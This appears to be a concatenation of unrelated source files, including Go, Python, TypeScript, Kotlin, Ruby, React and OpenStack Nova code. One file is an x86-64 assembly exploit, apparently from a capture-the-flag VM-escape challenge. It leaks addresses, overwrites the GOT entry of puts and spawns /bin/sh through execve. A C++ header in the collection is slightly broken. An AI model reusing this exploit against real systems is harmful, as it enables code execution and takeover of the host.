destroyedWall.GetComponent<SpriteRenderer>().enabled = true;
} else {
builtWall.GetComponent<BoxCollider2D>().enabled = true;
builtWall.GetComponent<SpriteRenderer>().enabled = true;
destroyedWall.GetComponent<SpriteRenderer>().enabled = false;
}
}
}
|
package routes
import (
"github.com/cmelgarejo/go-gql-server/internal/handlers"
auth "github.com/cmelgarejo/go-gql-server/internal/handlers/auth/middleware"
"github.com/cmelgarejo/go-gql-server/internal/logger"
"github.com/cmelgarejo/go-gql-server/internal/orm"
"github.com/cmelgarejo/go-gql-server/pkg/utils"
"github.com/gin-gonic/gin"
)
// GraphQL routes
func GraphQL(cfg *utils.ServerConfig, r *gin.Engine, orm *orm.ORM) error {
// GraphQL paths
gqlPath := cfg.VersionedEndpoint(cfg.GraphQL.Path)
pgqlPath := cfg.GraphQL.PlaygroundPath
g := r.Group(gqlPath)
// GraphQL handler
g.POST("", auth.Middleware(g.BasePath(), cfg, orm), handlers.GraphqlHandler(orm, &cfg.GraphQL))
logger.Info("GraphQL @ ", gqlPath)
// Playground handler
if cfg.GraphQL.IsPlaygroundEnabled {
logger.Info("GraphQL Playground @ ", g.BasePath()+pgqlPath)
g.GET(pgqlPath, handlers.PlaygroundHandler(g.BasePath()))
}
return nil
}
|
$remixd -s ./ --remix-ide https://remix.ethereum.org
access to https://remix.ethereum.org/
|
import OpenGL
#OpenGL.ERROR_CHECKING=False
#OpenGL.ERROR_LOGGING = False
#OpenGL.ERROR_ON_COPY = True
#OpenGL.FULL_LOGGING = True
from OpenGL.GL import *
from OpenGL.error import GLError
from OpenGL.GLU import *
from OpenGL.arrays import vbo
from OpenGL.GL import shaders
import time
import math, random
import numpy
from numpy import linalg
import logging
logger = logging.getLogger("underworlds.visibility")
import underworlds
from underworlds.types import *
from underworlds.helpers.geometry import transform, get_world_transform
from underworlds.helpers import transformations
FLAT_VERTEX_SHADER="""
#version 130
uniform mat4 u_viewProjectionMatrix;
uniform mat4 u_modelMatrix;
uniform vec4 u_materialDiffuse;
in vec3 a_vertex;
out vec4 v_color;
void main(void)
{
v_color = u_materialDiffuse;
gl_Position = u_viewProjectionMatrix * u_modelMatrix * vec4(a_vertex, 1.0);
}
"""
BASIC_FRAGMENT_SHADER="""
#version 130
in vec4 v_color;
void main() {
gl_FragColor = v_color;
}
"""
ROTATION_180_X = numpy.array([[1,0,0,0],[0,-1,0,0],[0,0,-1,0],[0,0,0,1]], dtype=numpy.float32)
DEFAULT_CLIP_PLANE_NEAR = 0.001
DEFAULT_CLIP_PLANE_FAR = 1000.0
class VisibilityMonitor:
def __init__(self, ctx, world, w=80, h=60, create_surface=True, debug=False):
self.debug = debug
self.w = w
self.h = h
if create_surface:
import pygame
pygame.init()
if not debug:
pygame.display.set_mode((w,h), pygame.OPENGL | pygame.DOUBLEBUF)
pygame.display.iconify()
else:
pygame.display.set_mode((w,h), pygame.OPENGL | pygame.DOUBLEBUF | pygame.RESIZABLE)
self.prepare_shaders()
self.ctx = ctx
self.world = world
self.scene = None
self.meshes = {} # stores the OpenGL vertex/faces/normals buffers pointers
self.node2colorid = {} # stores a color ID for each node. Useful for mouse picking and visibility checking
self.colorid2node = {} # reverse dict of node2colorid
self.cameras = []
self.load_world()
if not self.cameras:
raise RuntimeError("No camera in the world <%s>. Giving up." % self.world)
def prepare_shaders(self):
### Flat shader
flatvertex = shaders.compileShader(FLAT_VERTEX_SHADER, GL_VERTEX_SHADER)
fragment = shaders.compileShader(BASIC_FRAGMENT_SHADER, GL_FRAGMENT_SHADER)
self.flatshader = shaders.compileProgram(flatvertex,fragment)
self.set_shader_accessors( ('u_modelMatrix',
'u_viewProjectionMatrix',
'u_materialDiffuse',),
('a_vertex',), self.flatshader)
def set_shader_accessors(self, uniforms, attributes, shader):
# add accessors to the shaders uniforms and attributes
for uniform in uniforms:
location = glGetUniformLocation( shader, uniform )
if location in (None,-1):
raise RuntimeError('No uniform: %s (maybe it is not used '
'anymore and has been optimized out by'
' the shader compiler)'%( uniform ))
setattr( shader, uniform, location )
for attribute in attributes:
location = glGetAttribLocation( shader, attribute )
if location in (None,-1):
raise RuntimeError('No attribute: %s'%( attribute ))
setattr( shader, attribute, location )
def prepare_gl_buffers(self, id):
meshes = self.meshes
if id in meshes:
# mesh already loaded. Fine
return
meshes[id] = {}
# leave some time for new nodes to push their meshes
if not self.ctx.has_mesh(id):
logger.warning("Mesh ID %s is not available on the server... "
"waiting for it..." % id)
while not self.ctx.has_mesh(id):
time.sleep(0.01)
logger.info("Mesh ID %s is now available. Getting it..." % id)
mesh = self.ctx.mesh(id) # retrieve the mesh from the server
# Fill the buffer for vertex
v = numpy.array(mesh.vertices, 'f')
meshes[id]["vbo"] = vbo.VBO(v)
# Fill the buffer with faces indices
meshes[id]["faces"] = glGenBuffers(1)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, meshes[id]["faces"])
glBufferData(GL_ELEMENT_ARRAY_BUFFER,
numpy.array(mesh.faces, dtype=numpy.int32),
GL_STATIC_DRAW)
meshes[id]["nbfaces"] = len(mesh.faces)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER,0)
def get_rgb_from_colorid(self, colorid):
r = (colorid >> 0) & 0xff
g = (colorid >> 8) & 0xff
b = (colorid >> 16) & 0xff
return (r,g,b)
def get_color_id(self):
id = random.randint(0, 256*256*256)
if id not in self.colorid2node:
return id
else:
return self.get_color_id()
def glize(self, node):
if node.type == MESH:
colorid = self.get_color_id()
self.colorid2node[colorid] = node
self.node2colorid[node] = colorid
if hasattr(node, "cad"):
node.glmeshes = node.cad
elif hasattr(node, "lowres"):
node.glmeshes = node.lowres
elif hasattr(node, "hires"):
node.glmeshes = node.hires
else:
raise StandardError("The node %s has no mesh available!" % node.name)
for mesh in node.glmeshes:
self.prepare_gl_buffers(mesh)
elif node.type == CAMERA:
logger.info("Added camera <%s>" % node.name)
self.cameras.append(node)
def load_world(self):
logger.info("Preparing world <%s> for 3D rendering..." % self.world)
scene = self.scene = self.world.scene
nodes = scene.nodes
for node in nodes:
logger.info("Loading node <%s>" % node)
self.glize(node)
logger.info("World <%s> ready for visibility monitoring." % self.world)
def set_camera(self, name):
camera = None
for c in self.cameras:
if c.name == name:
camera = c
break
if camera is None:
raise RuntimeError("Camera <%s> does not exist in world <%s>" % (name, self.world.name))
# Update the camera position from the server
camera = self.scene.nodes[camera.id]
znear = camera.clipplanenear or DEFAULT_CLIP_PLANE_NEAR
zfar = camera.clipplanefar or DEFAULT_CLIP_PLANE_FAR
aspect = camera.aspect
fov = camera.horizontalfov
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
# Compute gl frustrum
tangent = math.tan(fov/2.)
h = znear * tangent
w = h * aspect
# params: left, right, bottom, top, near, far
glFrustum(-w, w, -h, h, znear, zfar)
# equivalent to:
#gluPerspective(fov * 180/math.pi, aspect, znear, zfar)
self.projection_matrix = glGetFloatv( GL_PROJECTION_MATRIX).transpose()
self.view_matrix = linalg.inv(get_world_transform(self.scene,camera))
# Rotate by 180deg around X to have Z pointing backward (OpenGL convention)
self.view_matrix = numpy.dot(ROTATION_180_X, self.view_matrix)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glMultMatrixf(self.view_matrix.transpose())
def render_colors(self):
glEnable(GL_DEPTH_TEST)
glDepthFunc(GL_LEQUAL)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glEnable(GL_CULL_FACE)
glUseProgram(self.flatshader)
glUniformMatrix4fv( self.flatshader.u_viewProjectionMatrix, 1, GL_TRUE,
numpy.dot(self.projection_matrix,self.view_matrix))
self.recursive_render(self.scene.rootnode, self.flatshader)
glUseProgram( 0 )
def compute_all(self):
"""
:returns: dictionary {camera: [visible nodes]}
Attention: The performances of this method relies heavily on the size of the display!
"""
visible_objects = {}
for c in self.cameras:
visible_objects[c.name] = self.from_camera(c.name)
return visible_objects
def from_camera(self, camera):
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.set_camera(camera)
self.render_colors()
# Capture image from the OpenGL buffer
buf = ( GLubyte * (3 * self.w * self.h) )(0)
glReadPixels(0, 0, self.w, self.h, GL_RGB, GL_UNSIGNED_BYTE, buf)
#Reinterpret the RGB pixel buffer as a 1-D array of 24bits colors
a = numpy.ndarray(len(buf), numpy.dtype('>u1'), buf)
colors = numpy.zeros(len(buf) / 3, numpy.dtype('<u4'))
for i in range(3):
colors.view(dtype='>u1')[i::4] = a.view(dtype='>u1')[i::3]
seen = numpy.unique(colors)
seen.sort()
seen = seen[1:] # remove the 0 for background
if self.debug:
import pygame
pygame.display.flip()
time.sleep(1)
return [self.colorid2node[i] for i in seen]
#colors = colors[numpy.nonzero(colors)] #discard black background
#if colors.any():
# bins = numpy.bincount(colors)
# ii = numpy.nonzero(bins)[0]
# for i in ii:
# print ("Node %s is visible (%d pix)" % (self.colorid2node[i], bins[i]))
#else:
# print("Nothing visible!")
def recursive_render(self, node, shader):
""" Main recursive rendering method.
"""
try:
m = get_world_transform(self.scene, node)
except AttributeError:
#probably a new incoming node, that has not yet been converted to numpy
self.glize(node)
m = get_world_transform(self.scene, node)
if node.type == MESH:
# if the node has been recently turned into a mesh, we might not
# have the mesh data yet.
if not hasattr(node, "glmeshes"):
self.glize(node)
for id in node.glmeshes:
stride = 12 # 3 * 4 bytes
colorid = self.node2colorid[node]
r,g,b= self.get_rgb_from_colorid(colorid)
glUniform4f( shader.u_materialDiffuse, r/255.0,g/255.0,b/255.0,1.0 )
glUniformMatrix4fv( shader.u_modelMatrix, 1, GL_TRUE, m )
vbo = self.meshes[id]["vbo"]
vbo.bind()
glEnableVertexAttribArray( shader.a_vertex )
glVertexAttribPointer(
shader.a_vertex,
3, GL_FLOAT,False, stride, vbo
)
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.meshes[id]["faces"])
glDrawElements(GL_TRIANGLES, self.meshes[id]["nbfaces"] * 3, GL_UNSIGNED_INT, None)
vbo.unbind()
glDisableVertexAttribArray( shader.a_vertex )
glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
for child in node.children:
try:
self.recursive_render(self.scene.nodes[child], shader)
except KeyError as ke:
logger.warning("Node ID %s listed as child of %s, but it"
" does not exist! Skipping it" % (child, repr(node)))
|
import * as fs from 'fs-extra';
import * as path from 'path';
import { Utils } from '~/utils';
import { State } from '~/states/state';
import { Processor } from '~/processors/processor';
import { Finalizer } from '~/processors/finalizer';
import { Rule, Environment, Configuration } from '~/models/builder-models';
import { ProcessorInput } from '~/models/processor-models';
export class Builder {
protected name: string;
protected envPromise: Promise<Environment>;
protected stateClass: typeof State;
protected env: Environment;
protected states: State[];
protected fileToRule: Map<string, Rule>;
protected ruleToTargets: Map<Rule, string[]>;
constructor(rootDir: string, workDir: string, userFile: string, defaults: any) {
this.envPromise = this.buildEnv(rootDir, workDir, userFile, defaults);
this.name = this.constructor.name;
this.stateClass = State;
this.ruleToTargets = new Map();
}
/**
* Import configs in user file, merge with default configs
* @param {string} userFile Path to user config file
* @returns {any} User configs
*/
private getConfig(userFile: string): any {
let userConfig: any = {};
if (fs.existsSync(userFile)) {
try {
userConfig = require(userFile);
} catch (err) {
Utils.fatal(`${userFile} corrupted or unreadable.`, err);
}
} else {
Utils.info(`${userFile} doesn't exist, will use default config.`);
}
return userConfig;
}
/**
* Sanitize config.
* @param {Configuration} config Config
* @param {string} rootDir Project root directory
* @returns {Configuration} Santinized config
*/
private sanitizeConfig(config: Configuration, rootDir: string): Configuration {
config.relativeSourceDir = config.sourceDir;
config.relativeTargetDir = config.targetDir;
config.sourceDir = path.resolve(rootDir, config.sourceDir);
config.targetDir = path.resolve(rootDir, config.targetDir);
config.rules.forEach(rule => {
rule.sources = rule.sources ? [].concat(rule.sources) : [];
rule.files = new Set();
rule.finalizer = new Finalizer(config.targetDir, rule.targets);
rule.processors = rule.processors || [];
rule.processors.forEach(processor => {
if (processor.process !== Processor.prototype.process) {
Utils.fatal(`${processor.id}: .process() shouldn't be overriden.`);
}
})
});
return config;
}
/**
* Merge default and user config.
* @param {any} defaults Default config
* @param {any} userConfig User config
* @returns {Configuration} Merged config
*/
private mergeConfig(defaults: any, userConfig: any): Configuration {
let fallbackRules: any[] = defaults.fallbackRules;
let rules: any[] = userConfig.rules || [];
let config: Configuration;
delete defaults.fallbackRules;
delete userConfig.fallbackRules;
config = Utils.shallowMerge(defaults, userConfig);
config.rules = fallbackRules.concat(rules);
return config;
}
/**
* Matches a file path against rules in reversed order, return the first found
* @param config Config
* @param file File to match
* @returns The matched rule, or undefined if no match
*/
protected matchRule(config: Configuration, file: string): Rule {
// Traverse in reverse order so later rules have higher priorities
for (let i = config.rules.length - 1; i >=0; --i) {
let rule = config.rules[i];
if (Utils.matchOrEqual(file, rule.sources)) {
return rule;
}
}
}
/**
* Scan source directory, get full manifest of files, and add matched files
* to each rule in config.
* Also build mapping from file path to matching rule.
* @param {Object} config Config
* @returns {Array} [Config with matched files, file path to rule mapping]
*/
private async matchSourceFiles(config: Configuration): Promise<Configuration> {
this.fileToRule = new Map();
(await Utils.listAllFiles(config.sourceDir, true)).forEach(file => {
let rule = this.matchRule(config, file);
if (rule) {
rule.files.add(file);
this.fileToRule.set(file, rule);
}
});
return config;
}
/**
* Consolidate global variables
* @param {string} rootDir Project directory
* @param {string} workDir Work directory
* @param {string} userFile User file name
* @param {any} defaults Default config
*/
private async buildEnv(rootDir: string, workDir: string, userFile: string, defaults: any): Promise<Environment> {
let userFilePath: string = path.resolve(rootDir, userFile);
let userConfig: any = this.getConfig(userFilePath);
let mergedConfig: Configuration = this.mergeConfig(defaults, userConfig);
let sanitizedConfig: Configuration = this.sanitizeConfig(mergedConfig, rootDir);
let config = await this.matchSourceFiles(sanitizedConfig);
let env = new Environment();
env.rootDir = rootDir;
env.workDir = workDir;
env.sourceDir = config.sourceDir;
env.targetDir = config.targetDir;
env.relativeSourceDir = config.relativeSourceDir;
env.relativeTargetDir = config.relativeTargetDir;
env.userFile = userFilePath;
env.config = config;
Utils.dbg() && Utils.debug('Environment: ', Utils.toJson(env));
return env;
}
/**
* Get all build targets
* @returns Array for targets
*/
protected getAllTargets(): string[] {
return [...this.ruleToTargets.values()]
.reduce((all, perRule) => all.concat(perRule), []);
}
/**
* Ensures a symlink to the node_modules dir exists in the processor work dir
* @param dir Work dir of a processor
*/
private async ensureNodeModules(dir: string): Promise<void> {
let npdir = path.resolve(this.env.rootDir, 'node_modules');
let symlink = path.resolve(dir, 'node_modules');
return fs.ensureSymlink(npdir, symlink);
}
/**
* Invoke processors in a rule, mutate states
* @param rule Rule
* @param state State
* @returns true if all processors succeeded, false otherwise
*/
protected async invokeProcessors(rule: Rule, state: State): Promise<boolean> {
let success: boolean = true;
for (let processor of rule.processors) {
let input: ProcessorInput = state.nextInput();
await this.ensureNodeModules(state.currentContext().rootDir);
let output = await processor.process(input);
state.saveOutput(output);
success = success && !output.failures.length;
}
if (rule.processors.length) {
let targets: string[] = await rule.finalizer.finalize(state.finalizerInput());
Utils.dbg() && Utils.debug(`Build passed in ${rule.sources}:`, targets);
this.ruleToTargets.set(rule, targets);
}
return success;
}
/**
* Do one time build
* @returns Promise, resolve when done.
*/
async build(): Promise<void> {
let success: boolean = true;
this.env = await this.envPromise;
this.states = await Promise.all(this.env.config.rules.map(async rule => {
let state = new this.stateClass(this.env, rule);
if (rule.files.size) {
state.beforeBuild();
success = await this.invokeProcessors(rule, state) && success;
state.afterBuild();
}
return state;
}));
let targets: string[] = this.getAllTargets();
Utils.dbg() && Utils.debug(`${this.name}: Final targets`, targets);
return Utils.cleanDirectory(this.env.targetDir, targets)
.then(() => Utils.info(`Build ${success ? 'SUCCESS' : 'FAILED'}`))
.catch(ex => Utils.error(`Error happened during cleanup`, ex));
}
exit(): void {
}
}
|
package mx.buap.fcc.clasificador.model
import mx.buap.fcc.clasificador.tools.MathTools
import java.math.BigDecimal
import java.math.BigDecimal.*
import java.math.RoundingMode
import java.util.*
/**
*
* @author Carlos Montoya
*/
class Instance
constructor(val indice: Int = 0,
val clazz: Int = -1,
val data: Array<BigDecimal>)
{
companion object { const val precision = 13 }
private var dataSet: DataSet? = null
operator fun get(i: Int) = data[i]
operator fun set(i: Int, att: BigDecimal) { data[i] = att }
fun size() = data.size
fun setDataSet(ds: DataSet) { this.dataSet = ds }
fun distance(other: Instance): BigDecimal {
var sqrDistSum = ZERO
for (i in data.indices)
sqrDistSum += data[i].subtract(other[i]).pow(2)
return MathTools.sqrt(sqrDistSum, precision)
}
/**
* Retorna la distancia entre el atributo especificado y el segundo parametro
* de la funcion. Si el atributo es de tipo nominal la distancia es igual a
* 1 si el valor del atributo es igual al especificado, o 0 en caso contrario.
*/
private fun distance(attribute: Int, other: BigDecimal?): BigDecimal =
when {
other == null -> ONE
dataSet?.isNominal(attribute) == true ->
if (data[attribute] == other) ZERO
else ONE
else -> data[attribute].subtract(other).abs()
}
/**
* Normaliza este DataRow mediante el metodo min-max, a partir de los parametros especificados.
*
*/
fun minmax(newMin: BigDecimal, newMax: BigDecimal) {
val diffNewMinNewMax = newMax - newMin
for (i in data.indices) {
val diffMinMax = dataSet!!.maximum[i] - dataSet!!.minimum[i]
if (diffMinMax == ZERO)
data[i] = (newMin + newMax) / BigDecimal(2)
else if (dataSet!!.isNumerical(i))
data[i] = data[i]
.subtract(dataSet!!.minimum[i])
.divide(diffMinMax, precision, RoundingMode.HALF_UP)
.multiply(diffNewMinNewMax)
.add(newMin)
.stripTrailingZeros()
}
}
/**
* Normaliza este Row mediante el metodo z-score, a partir de los parametros especificados.
*
*/
fun zScore() {
val stdDvtn = dataSet!!.standardDeviation
val avrg = dataSet!!.average
for (i in data.indices) {
if (dataSet!!.isNumerical(i) && stdDvtn[i] != ZERO )
data[i] = data[i]
.subtract(avrg[i])
.divide(stdDvtn[i], precision, RoundingMode.HALF_UP)
.stripTrailingZeros()
}
}
/**
* Normaliza este Row mediante el metodo decimal-scaling, a partir de los parametros especificados.
*
*/
fun decimalScaling(j: IntArray)
{
for (i in data.indices)
if (dataSet!!.isNumerical(i))
data[i] = data[i].movePointLeft(j[i]).stripTrailingZeros()
}
override fun toString() = "Instance(indice=$indice, clazz=$clazz, values=${data.contentToString()})"
}
|
#!/bin/bash
curl -o waifu $1
DESCRIPTION=$(node lib/index.js $1)
if [ $? -eq 0 ]; then
t update "$DESCRIPTION" -f waifu
else
echo failed
fi
rm waifu
|
# Copyright (C) 2009-2019 MongoDB Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module BSON
# Injects behaviour for encoding and decoding regular expression values to
# and from raw bytes as specified by the BSON spec.
#
# @see http://bsonspec.org/#/specification
#
# @since 2.0.0
module Regexp
include JSON
# A regular expression is type 0x0B in the BSON spec.
#
# @since 2.0.0
BSON_TYPE = 11.chr.force_encoding(BINARY).freeze
# Extended value constant.
#
# @since 3.2.6
EXTENDED_VALUE = 'x'.freeze
# Ignore case constant.
#
# @since 3.2.6
IGNORECASE_VALUE = 'i'.freeze
# Multiline constant.
#
# @since 3.2.6
MULTILINE_VALUE = 'm'.freeze
# Newline constant.
#
# @since 3.2.6
NEWLINE_VALUE = 's'.freeze
# Ruby multiline constant.
#
# @since 3.2.6
#
# @deprecated Will be removed in 5.0
RUBY_MULTILINE_VALUE = 'ms'.freeze
# Get the regexp as JSON hash data.
#
# @example Get the regexp as a JSON hash.
# regexp.as_json
#
# @return [ Hash ] The regexp as a JSON hash.
#
# @since 2.0.0
def as_json(*args)
{ "$regex" => source, "$options" => bson_options }
end
# Get the regular expression as encoded BSON.
#
# @example Get the regular expression as encoded BSON.
# %r{\d+}.to_bson
#
# @note From the BSON spec: The first cstring is the regex pattern,
# the second is the regex options string. Options are identified
# by characters, which must be stored in alphabetical order.
# Valid options are 'i' for case insensitive matching,
# 'm' for multiline matching, 'x' for verbose mode,
# 'l' to make \w, \W, etc. locale dependent,
# 's' for dotall mode ('.' matches everything),
# and 'u' to make \w, \W, etc. match unicode.
#
# @param [ BSON::ByteBuffer ] buffer The byte buffer to append to.
# @param [ true, false ] validating_keys
#
# @return [ BSON::ByteBuffer ] The buffer with the encoded object.
#
# @see http://bsonspec.org/#/specification
#
# @since 2.0.0
def to_bson(buffer = ByteBuffer.new, validating_keys = Config.validating_keys?)
buffer.put_cstring(source)
buffer.put_cstring(bson_options)
end
private
def bson_options
# Ruby's Regexp always has BSON's equivalent of 'm' on, so always add it
bson_ignorecase + MULTILINE_VALUE + bson_dotall + bson_extended
end
def bson_extended
(options & ::Regexp::EXTENDED != 0) ? EXTENDED_VALUE : NO_VALUE
end
def bson_ignorecase
(options & ::Regexp::IGNORECASE != 0) ? IGNORECASE_VALUE : NO_VALUE
end
def bson_dotall
# Ruby Regexp's MULTILINE is equivalent to BSON's dotall value
(options & ::Regexp::MULTILINE != 0) ? NEWLINE_VALUE : NO_VALUE
end
# Represents the raw values for the regular expression.
#
# @see https://jira.mongodb.org/browse/RUBY-698
#
# @since 3.0.0
class Raw
include JSON
# @return [ String ] pattern The regex pattern.
attr_reader :pattern
# @return [ Integer ] options The options.
attr_reader :options
# Compile the Regular expression into the native type.
#
# @example Compile the regular expression.
# raw.compile
#
# @return [ ::Regexp ] The compiled regular expression.
#
# @since 3.0.0
def compile
@compiled ||= ::Regexp.new(pattern, options_to_int)
end
# Initialize the new raw regular expression.
#
# @example Initialize the raw regexp.
# Raw.new(pattern, options)
#
# @param [ String ] pattern The regular expression pattern.
# @param [ String, Integer ] options The options.
#
# @note The ability to specify options as an Integer is deprecated.
# Please specify options as a String. The ability to pass options as
# as Integer will be removed in version 5.0.0.
#
# @since 3.0.0
def initialize(pattern, options = '')
@pattern = pattern
@options = options
end
# Allow automatic delegation of methods to the Regexp object
# returned by +compile+.
#
# @param [ String] method The name of a method.
#
# @since 3.1.0
def respond_to?(method, include_private = false)
compile.respond_to?(method, include_private) || super
end
# Encode the Raw Regexp object to BSON.
#
# @example Get the raw regular expression as encoded BSON.
# raw_regexp.to_bson
#
# @note From the BSON spec: The first cstring is the regex pattern,
# the second is the regex options string. Options are identified
# by characters, which must be stored in alphabetical order.
# Valid options are 'i' for case insensitive matching,
# 'm' for multiline matching, 'x' for verbose mode,
# 'l' to make \w, \W, etc. locale dependent,
# 's' for dotall mode ('.' matches everything),
# and 'u' to make \w, \W, etc. match unicode.
#
# @param [ BSON::ByteBuffer ] buffer The byte buffer to append to.
# @param [ true, false ] validating_keys
#
# @return [ BSON::ByteBuffer ] The buffer with the encoded object.
#
# @see http://bsonspec.org/#/specification
#
# @since 4.2.0
def to_bson(buffer = ByteBuffer.new, validating_keys = Config.validating_keys?)
return compile.to_bson(buffer, validating_keys) if options.is_a?(Integer)
buffer.put_cstring(source)
buffer.put_cstring(options.chars.sort.join)
end
# Get the raw BSON regexp as JSON hash data.
#
# @example Get the raw regexp as a JSON hash.
# raw_regexp.as_json
#
# @return [ Hash ] The raw regexp as a JSON hash.
#
# @since 4.2.0
def as_json(*args)
as_extended_json(mode: :legacy)
end
# Converts this object to a representation directly serializable to
# Extended JSON (https://github.com/mongodb/specifications/blob/master/source/extended-json.rst).
#
# @option opts [ nil | :relaxed | :legacy ] :mode Serialization mode
# (default is canonical extended JSON)
#
# @return [ Hash ] The extended json representation.
def as_extended_json(**opts)
if opts[:mode] == :legacy
{ "$regex" => source, "$options" => options }
else
{"$regularExpression" => {'pattern' => source, "options" => options}}
end
end
# Check equality of the raw bson regexp against another.
#
# @example Check if the raw bson regexp is equal to the other.
# raw_regexp == other
#
# @param [ Object ] other The object to check against.
#
# @return [ true, false ] If the objects are equal.
#
# @since 4.2.0
def ==(other)
return false unless other.is_a?(::Regexp::Raw)
pattern == other.pattern &&
options == other.options
end
alias :eql? :==
private
def method_missing(method, *arguments)
return super unless respond_to?(method)
compile.send(method, *arguments)
end
def options_to_int
return options if options.is_a?(Integer)
opts = 0
opts |= ::Regexp::IGNORECASE if options.include?(IGNORECASE_VALUE)
opts |= ::Regexp::MULTILINE if options.include?(NEWLINE_VALUE)
opts |= ::Regexp::EXTENDED if options.include?(EXTENDED_VALUE)
opts
end
end
module ClassMethods
# Deserialize the regular expression from BSON.
#
# @param [ ByteBuffer ] buffer The byte buffer.
#
# @option opts [ nil | :bson ] :mode Decoding mode to use.
#
# @return [ Regexp ] The decoded regular expression.
#
# @see http://bsonspec.org/#/specification
#
# @since 2.0.0
def from_bson(buffer, **opts)
pattern = buffer.get_cstring
options = buffer.get_cstring
Raw.new(pattern, options)
end
end
# Register this type when the module is loaded.
#
# @since 2.0.0
Registry.register(BSON_TYPE, ::Regexp)
end
# Enrich the core Regexp class with this module.
#
# @since 2.0.0
::Regexp.send(:include, Regexp)
::Regexp.send(:extend, Regexp::ClassMethods)
end
|
BITS 64
%define marker 0x1583
%define honco 0x1508
mov eax, honco
mov edi, 0x64
out dx, al
; Gets to the base address
;REMOTE
;mov rbx, 0xfffffffffff72000
;LOCAL
mov rbx, 0xfffffffffff6a000
; Leak addess of vmem
mov rax, rbx
add rax, 0x2319
mov edi, 0x64
out dx, al
; Leak offset of execve call
lea rax, [rel execve]
mov edi, 0x62
out dx, al
; Now overwrite GOT address of puts
mov rax, rbx
add rax, 0x2130
mov rsi, 8
mov edi, 0x63
out dx, al
lea eax, [rel flag]
mov edi, 0x64
out dx, al
; DEBUG
mov edi, 0x62
out dx, al
; Now issue a write_line, which will actually call execve(/bin/sh)
mov edi, 0x64
out dx, al
; DEBUG
mov edi, 0x62
out dx, al
;loop:
; mov rax, rbx
; mov edi, 0x62
; out dx, al
;
;; mov rax, rbx
;; mov esi, 1
;; mov edi, 0x63
;; out dx, al
;;
;; mov edi, 0x62
;; out dx, al
;
; mov rax, rbx
; mov edi, 0x64
; out dx, al
;
; sub rbx, 0x8
; jmp loop
; Exit
mov edx, 0xc
int 0x80
hlt
; execve
execve:
lea rdi, [rel binsh]
push 0
mov rsi, rsp
mov rdx, rsp
mov eax, 59
syscall
flag:
db 'flag', 0
binsh:
db '/bin/sh', 0
|
# my-portfolio
repo con mi página web donde pretendo aplicar todo lo aprendido hasta el momento
|
import React from 'react';
import {
injectIntl,
} from 'react-intl';
import PropTypes from 'prop-types';
import { SelectionFilter } from '@folio/stripes-acq-components';
import { useCloseReasonOptions } from '../hooks';
import { closingReasonsShape } from '../shapes';
const ClosingReasonFilter = ({ closingReasons, intl: { formatMessage }, ...rest }) => {
const translatedReasonsOptions = useCloseReasonOptions(formatMessage, closingReasons);
return (
<SelectionFilter
{...rest}
options={translatedReasonsOptions}
/>
);
};
ClosingReasonFilter.propTypes = {
closingReasons: closingReasonsShape,
intl: PropTypes.object.isRequired,
};
export default injectIntl(ClosingReasonFilter);
|
#pragma once
namespace silk
{
namespace params
{
class IParam
{
virtual ~IParam() = default;
virtual q::Path const& get_path() const = 0;
virtual std::string const& get_ui_prefix() const = 0;
virtual std::string const& get_ui_suffix() const = 0;
virtual std::string const& get_ui_name() const = 0;
virtual void set_enabled(bool enabled) = 0;
virtual bool is_enabled() const = 0;
boost::variant<boo, int32_t, float, std::string> Value;
virtual Value get_value() const = 0;
virtual void set_value(Value const& value) = 0;
virtual bool is_value_compatible(Value const& value) const = 0;
virtual bool is_value_valid(Value const& value) const = 0;
}
}
}
|
1. flow
2.classes
2a. class relationships
-user is welcomed
-user selects a number
-user recieves a numbered list of albums
-user makes selection
-user recieves info on album and artist
-user is asked if they want to start over
-user exits
Classes
-event
-CLI
-Scraper
what is an album?
an album has a name
an album has an artist
an album has info
|
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
from webob import exc
from nova import compute
from nova import exception
from nova import policy
from nova.i18n import _
from nova.api.openstack import wsgi
from nova.api.openstack import extensions
authorize = extensions.extension_authorizer('compute', 'eayun-userdata')
class EayunUserDataController(wsgi.Controller):
"""EayunStack userdata controller."""
def __init__(self, ext_mgr=None):
super(EayunUserDataController, self).__init__()
self.compute_api = compute.API()
self.ext_mgr = ext_mgr
def _validate_user_data(self, user_data):
"""Check if the user_data is encoded properly."""
if not user_data:
return
try:
base64.b64decode(user_data)
except:
expl = _('Userdata content cannot be decoded')
raise exc.HTTPBadRequest(explanation=expl)
def _get_userdata(self, instance):
user_data = {'user_data': instance.get("user_data", None)}
return user_data
def _is_valid_body(self, body, entity_name):
if not (body and entity_name in body):
return False
def is_dict(d):
return type(d) is dict
return is_dict(body)
def show(self, req, id):
"""Return userdata by server id."""
context = req.environ['nova.context']
authorize(context)
try:
instance = self.compute_api.get(context, id,
want_objects=True)
req.cache_db_instance(instance)
except exception.NotFound:
msg = _("Instance could not be found")
raise exc.HTTPNotFound(explanation=msg)
return self._get_userdata(instance)
def update(self, req, id, body):
"""Update userdata by server id."""
if not self._is_valid_body(body, 'user_data'):
raise exc.HTTPUnprocessableEntity()
context = req.environ['nova.context']
authorize(context)
update_dict = {}
user_data = body['user_data']
self._validate_user_data(user_data)
update_dict['user_data'] = user_data
try:
instance = self.compute_api.get(context, id,
want_objects=True)
except exception.NotFound:
msg = _("Instance could not be found")
